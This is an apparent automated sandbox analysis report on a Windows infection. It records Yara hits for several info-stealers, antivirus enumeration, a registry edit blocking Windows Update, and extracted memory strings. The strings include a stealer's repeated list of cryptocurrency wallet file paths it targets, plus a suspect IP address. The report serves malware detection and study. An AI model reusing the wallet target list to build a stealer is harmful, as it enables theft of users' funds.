Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 1c8dd6ecf9.exe, 0000000E.00000003.4074094726.00000000010A0000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4074254154.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4074094726.00000000010B1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.ea0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2165469048.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2761888853.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2133034325.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2163751236.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: dfa5c95181.exe PID: 6896, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 1c8dd6ecf9.exe PID: 3924, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 49.2.1fa18d372f.exe.44d94e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.0.1fa18d372f.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.44d94e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.3396644733.0000000004479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.3376964125.0000000000E62000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.3659341926.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3764438263.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3755390540.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3202576047.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2997018123.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match

File source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16er\AppData\Roaming\\Electrum-LTC\wallets\\..*
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\.\*&
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
